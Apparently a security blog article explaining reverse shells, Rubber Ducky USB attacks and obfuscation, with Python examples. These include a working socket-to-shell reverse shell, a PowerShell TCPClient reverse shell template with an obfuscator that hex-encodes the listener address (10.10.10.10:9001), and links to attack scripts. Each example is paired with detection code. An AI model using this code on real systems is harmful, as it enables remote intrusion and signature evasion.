This article discusses why cyber security matters to today’s business, including threats from insiders and social engineering. It covers the “Reverse Shell” technique for remote control of a system, the use of USB devices to inject malicious code, and obfuscation as a way of complicating detection. The main focus is on protection methods and on the need to strengthen security measures against such attacks.
Today technology is an integral part of business, so the security of computer systems has become critical for every company. The vulnerabilities of those systems are not only technical weaknesses in software or hardware. The vulnerability that is most often overlooked is people.
Insider threats to data security are especially dangerous because they can be combined with social engineering. One of the simplest ways for an attacker to get into an enterprise system is to obtain physical access to a computer or to network resources: a USB device with embedded malware is enough to introduce malicious code into the company’s network.
“Reverse Shell” is a technique attackers use to gain remote control of a computer or server without physical access to the target. The idea is that malicious code on the victim’s machine opens an outbound connection (the “reverse shell” or “back channel”) to a listener run by the attacker, who then sends commands through it and receives their results over the network. Because the victim initiates the connection, it passes through firewalls and NAT that only filter inbound traffic, which is why attackers prefer it to a bind shell that waits for an inbound connection.
The technique is powerful and dangerous because it gives the attacker interactive control over the target with the privileges of the account that ran the payload. The main stages of a “Reverse Shell” attack are:
System infection: the attacker exploits a vulnerability in the target system or uses social engineering to get malicious code onto the victim’s computer.
Creating the reverse shell: once the code runs, it connects back to the attacker’s server, establishing a “tunnel” between attacker and victim through which commands are sent and responses returned.
Command execution: with the reverse shell in place, the attacker can remotely run any command the compromised account is permitted to run on the victim’s computer, such as deleting files, changing configurations or stealing data.
Two main types of “Reverse Shell” can be distinguished by transport: TCP and HTTP. A “Reverse TCP Shell” carries the command channel over a raw TCP connection between attacker and victim, while a “Reverse HTTP(S) Shell” wraps the same channel in HTTP or HTTPS requests so that it blends in with ordinary web traffic and passes through proxies. Each type has its advantages and disadvantages, and the attacker chooses according to the target environment.
The main uses of a “Reverse Shell” are cyberespionage, compromising systems, theft of confidential data, pivoting from the compromised host into internal networks, and other abuse. Understanding this threat is therefore essential for developing effective strategies to prevent and detect such attacks in modern cyber security systems.
Consider the methods and technologies attackers use to inject malicious code into a computer or network with USB devices. Such attacks can be extremely effective because USB devices are commonplace and users plug them in without a second thought.
Malicious USB device: the attacker prepares a USB device carrying malicious code such as a virus, a Trojan, a keylogger or another malicious program, designed to run automatically when the device is connected to the target computer.
Physical disguise: the attacker can hide the malicious device inside an ordinary-looking object such as a USB cable, flash drive, mouse or even a keyboard. Once connected, the device performs its tasks without the user’s knowledge.
An example of such malicious code in Python: https://pastebin.com/pVdacpHr. The script does the following:
Imports the necessary modules (socket, subprocess, os).
Creates a socket object (s) and connects it to the attacker’s IP address (10.10.10.10) and port 9001.
Redirects standard input, output and error to the socket: s.fileno() returns the socket’s file descriptor and os.dup2() duplicates it onto descriptors 0, 1 and 2.
Imports the pty module and calls pty.spawn("sh"), which starts the command shell available on most UNIX-like systems; because descriptors 0, 1 and 2 now point at the socket, everything the shell reads and writes travels over the network to the attacker.
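The mechanism described above, reduced to a loopback demonstration (an added example, not the pastebin script): both sides run in one process on 127.0.0.1, the listener plays the attacker and connect_back() plays the victim. The pty.spawn("sh") step is replaced by handing the socket descriptor directly to a child sh, which gives the child the same descriptors 0, 1 and 2 without hijacking the demonstrating process and keeps the exchange deterministic. After the exchange comes the check a defender would run against this trick: a process whose stdin, stdout and stderr all point at a socket, visible on Linux as the link targets under /proc/<pid>/fd. The loopback address, the sample command and the /proc-based helper are assumptions of this example.

```python
"""Loopback demonstration of a TCP reverse shell plus a detection check.

Added example: not the article's pastebin script. Attacker listener and victim
connector run in one process on 127.0.0.1 (assumed) so the exchange is offline.
"""
import os
import socket
import subprocess
import threading


def _listener(srv, commands, out):
    """Attacker side: accept the inbound connection, send commands, collect output."""
    conn, _ = srv.accept()
    conn.settimeout(10)                       # never hang if the shell does not exit
    with conn:
        conn.sendall(commands + b"\nexit\n")  # 'exit' makes sh terminate and drop the socket
        while True:
            chunk = conn.recv(4096)
            if not chunk:                     # EOF: the victim's shell has exited
                break
            out.append(chunk)


def connect_back(host, port, shell=("sh",)):
    """Victim side: connect out to the attacker and give a shell the socket as its stdio.

    The article's script calls os.dup2() on its own descriptors 0/1/2 and then
    pty.spawn("sh"); here the socket descriptor is passed to Popen, which dup2()s it
    onto 0, 1 and 2 inside the child. The child sees the same thing: a shell whose
    input and output are the network connection.
    """
    s = socket.create_connection((host, port))
    fd = s.fileno()
    proc = subprocess.Popen(list(shell), stdin=fd, stdout=fd, stderr=fd)
    s.close()                                 # the child holds its own copies
    return proc.wait()


def reverse_shell_exchange(commands=b"echo reverse-shell-test"):
    """Run listener and victim on loopback; return (shell exit status, bytes the attacker got)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))                # port 0: let the OS pick a free one
    srv.listen(1)
    port = srv.getsockname()[1]
    out = []
    t = threading.Thread(target=_listener, args=(srv, commands, out), daemon=True)
    t.start()
    status = connect_back("127.0.0.1", port)
    t.join(15)
    srv.close()
    return status, b"".join(out)


# --- detection side ---------------------------------------------------------

def is_reverse_shell(fd_targets):
    """True when stdin, stdout and stderr all point at a socket.

    fd_targets maps descriptor number -> readlink target in the form Linux exposes
    under /proc/<pid>/fd/, e.g. 'socket:[123456]', '/dev/pts/0' or 'pipe:[7890]'.
    A normal shell has a tty or pipe on 0/1/2; a socket on all three is the
    footprint of the dup2() trick described in the article.
    """
    return all(str(fd_targets.get(fd, "")).startswith("socket:") for fd in (0, 1, 2))


def stdio_targets(pid):
    """Read descriptors 0/1/2 of a live process from /proc (Linux only; assumed helper)."""
    targets = {}
    for fd in (0, 1, 2):
        try:
            targets[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:
            targets[fd] = ""
    return targets


if __name__ == "__main__":
    print(reverse_shell_exchange())
```

Run on a UNIX-like host with sh on the PATH. Note that nothing in the exchange is encrypted or authenticated; on the wire it looks like a plain TCP session carrying shell text, which is exactly what an HTTP(S) variant tries to hide. The detection check works on any process: `is_reverse_shell(stdio_targets(pid))` over `/proc` flags a shell whose standard descriptors were replaced by a socket regardless of how the payload was obfuscated.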
Code obfuscation is the transformation of program code so that it is harder for a human to analyse and understand. It is typically used to keep attackers, anti-virus programs or other code analysis tools from understanding or interfering with the code.
Obfuscation can involve various techniques, such as renaming variables and functions, adding redundant or unnecessary constructs, encrypting strings, or using convoluted language constructs that hide the program’s logic.
The purpose of obfuscation is to make code less understandable to a reader or an analysis tool without changing what it does when executed. For legitimate software this hinders reverse engineering; for malware it slows down analysts and defeats signature-based detection that matches on variable names or string constants. Because the program’s behaviour is unchanged, it does nothing against behavioural detection, for instance a PowerShell process opening an outbound TCP connection.
The PowerShell reverse shell generator by deeexcee-io (github: https://github.com/deeexcee-io/PowerShell-Reverse-Shell-Generator) obfuscates its reverse shell script in the following steps:
Entering the IP address and port.
Replacing the variables in the script with random 10-character names, except for the $PSHOME variable.
Replacing certain fixed phrases in the script with random strings of characters.
Replacing ‘$LHOST’ and ‘$LPORT’ with the entered IP address and port.
Converting the IP address to hexadecimal.
Converting the port number to hexadecimal, leaving the literal 65535 unchanged.
Printing the modified script to the console.
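Two of the transformations above, variable renaming and hex-encoding the listener address, applied in Python to a constructed PowerShell reverse shell template, with the detection-side counterpart: a normaliser that shows these transformations leave the script’s structure untouched. This is an added example and not the deeexcee-io generator; the template, the exact hex encoding (one 0x integer for the IP, hex() for the port), the set of automatic variables that are kept (the article mentions only $PSHOME) and the fact that the phrase-replacement step is omitted are all assumptions of this example.

```python
"""Added example, not the deeexcee-io generator: variable renaming and hex-encoding
of LHOST/LPORT on a constructed PowerShell template, plus a normaliser for detection."""
import random
import re

# Constructed template in the style of the common PowerShell TCPClient reverse shell
# (assumption; not taken from the generator). $LHOST/$LPORT are the placeholders.
TEMPLATE = """$client = New-Object System.Net.Sockets.TCPClient('$LHOST', $LPORT)
$stream = $client.GetStream()
$bytes = New-Object byte[] 65535
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
  $data = (New-Object System.Text.ASCIIEncoding).GetString($bytes, 0, $i)
  $sendback = (Invoke-Expression $data 2>&1 | Out-String)
  $sendbyte = ([System.Text.Encoding]::ASCII).GetBytes($sendback)
  $stream.Write($sendbyte, 0, $sendbyte.Length)
  $stream.Flush()
}
$client.Close()
"""

# Variables that must keep their names. The article names only $PSHOME; the others
# are added here (assumption) because PowerShell defines them automatically.
KEEP = {"pshome", "_", "true", "false", "null", "env"}
VAR = re.compile(r"\$([A-Za-z_]\w*)")


def ip_to_hex(ip):
    """'10.10.10.10' -> '0x0a0a0a0a' (assumed encoding; the article only says 'hexadecimal')."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError(f"not an IPv4 address: {ip!r}")
    return "0x" + "".join(f"{o:02x}" for o in octets)


def obfuscate(script, lhost, lport, seed=None):
    """Fill in LHOST/LPORT as hex, then give every user variable a random 10-letter name."""
    rng = random.Random(seed)                 # seed only so the output is reproducible
    script = script.replace("$LHOST", ip_to_hex(lhost)).replace("$LPORT", hex(int(lport)))
    names = {}

    def rename(m):
        name = m.group(1)
        if name.lower() in KEEP:
            return m.group(0)
        key = name.lower()                    # PowerShell variable names are case-insensitive
        if key not in names:
            names[key] = "".join(rng.choice("abcdefghijklmnopqrstuvwxyz") for _ in range(10))
        return "$" + names[key]

    return VAR.sub(rename, script)


def skeleton(script):
    """Detection-side normaliser: collapse variable names, numbers and string literals.

    Renaming and hex-encoding only touch these tokens, so the obfuscated script has
    exactly the same skeleton as the original. A rule written against the skeleton
    (for example 'New-Object System.Net.Sockets.TCPClient' together with
    'Invoke-Expression') survives this generator's transformations.
    """
    s = VAR.sub(lambda m: m.group(0) if m.group(1).lower() in KEEP else "$V", script)
    s = re.sub(r"'[^']*'", "'S'", s)
    s = re.sub(r"\b(?:0x[0-9a-fA-F]+|\d+)\b", "N", s)
    return s


if __name__ == "__main__":
    print(obfuscate(TEMPLATE, "10.10.10.10", 9001, seed=1))
```

The point of skeleton() is the caveat from the obfuscation paragraph: a signature keyed on `$client` or on the string `10.10.10.10` is defeated, but one keyed on the cmdlet and .NET class names is not, because the generator never changes them.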
The Rubber Ducky is a device created to automate attacks by imitating keyboard input.
When a Rubber Ducky is connected to a computer via USB it presents itself as a keyboard and sends its pre-programmed keystrokes to the target computer. Because the operating system trusts keyboards, the injected text runs with the privileges of the logged-in user and no software vulnerability is needed; within seconds the device can open a prompt, execute commands and reach important information.
When a Rubber Ducky is used for a reverse shell, its script mimics the keystrokes needed to launch a program that connects to the attacker’s server. That server is configured to accept the reverse connection and run commands over it, giving the attacker remote access to the system over the Internet.
Code example: https://pastebin.com/b631zyCY
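A dry-run interpreter for Rubber Ducky payloads, as an added example that is not the pastebin script above: it replays the DuckyScript commands (REM, DEFAULT_DELAY, DELAY, STRING, ENTER and key combinations such as GUI r) in memory to reconstruct what the target machine would have received, and flags any submitted line that starts with a command interpreter. This is how an analyst triages a payload recovered from a suspicious device without ever plugging it in. The sample payload is constructed; its quoted command text is a placeholder, not a working connect-back command, and the list of launcher programs is an assumption.

```python
"""Added example: a dry-run interpreter for DuckyScript payloads.

Nothing is typed; the script is replayed in memory to reconstruct what the target
machine would have seen, which is how to triage a payload recovered from a device."""

# Constructed sample payload (not the article's pastebin script). The quoted command
# is a placeholder and does not connect anywhere.
SAMPLE = """REM open the Run dialog and start a hidden PowerShell
DEFAULT_DELAY 100
GUI r
DELAY 500
STRING powershell -WindowStyle Hidden -Command "<connect-back command here>"
ENTER
"""

# Programs that, once typed into a Run dialog or prompt, execute whatever follows
# (assumed list; extend for the environment being defended).
LAUNCHERS = {"powershell", "pwsh", "cmd", "wscript", "cscript", "mshta", "certutil",
             "sh", "bash", "python", "curl", "wget"}


def parse_ducky(text):
    """Split a payload into (COMMAND, argument) pairs, dropping comments and blank lines."""
    steps = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "REM":
            continue
        steps.append((cmd.upper(), arg))
    return steps


def dry_run(text):
    """Replay the keystrokes: one record per submitted line, with the key combination
    that preceded it and the milliseconds elapsed between that combination and ENTER."""
    typed, buf, combo, delay, default_delay = [], "", None, 0, 0
    for cmd, arg in parse_ducky(text):
        if cmd in ("DEFAULT_DELAY", "DEFAULTDELAY"):
            default_delay = int(arg)          # pause inserted after every later command
            continue
        if cmd == "DELAY":
            delay += int(arg)
        elif cmd == "STRING":
            buf += arg                        # consecutive STRINGs concatenate
        elif cmd == "ENTER":
            typed.append({"after": combo, "text": buf, "delay_ms": delay})
            buf, combo, delay = "", None, 0
            continue
        else:                                 # GUI r, CTRL ALT t, ALT F4, ...
            combo = (cmd + " " + arg).strip()
        delay += default_delay
    if buf:                                   # text typed but never submitted
        typed.append({"after": combo, "text": buf, "delay_ms": delay})
    return typed


def flag_launchers(text):
    """Return the submitted lines whose first word is a command interpreter or downloader."""
    hits = []
    for item in dry_run(text):
        first = item["text"].split(" ", 1)[0].lower()
        if first.endswith(".exe"):
            first = first[:-4]
        if first in LAUNCHERS:
            hits.append(item)
    return hits


if __name__ == "__main__":
    for hit in flag_launchers(SAMPLE):
        print(f'{hit["after"]} -> {hit["text"]}  ({hit["delay_ms"]} ms)')
```

The delay figure is worth keeping: a payload that waits 500 ms after GUI r is tuned for a specific machine, and the same reconstruction shows what a keystroke-injection blocker (one that rejects a “keyboard” typing faster than a human or whitelists known keyboard IDs) would have to intercept.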
Our research highlights the need to strengthen security measures, taking into account the possibility that malicious programs are introduced through USB ports and that obfuscation is used to hide them from analysis.
Disclaimer. This article is created for informational purposes only. All advice and instructions are provided for educational purposes and we are not responsible for any possible consequences related to the implementation of this project. Always use safety precautions when working with electronic components.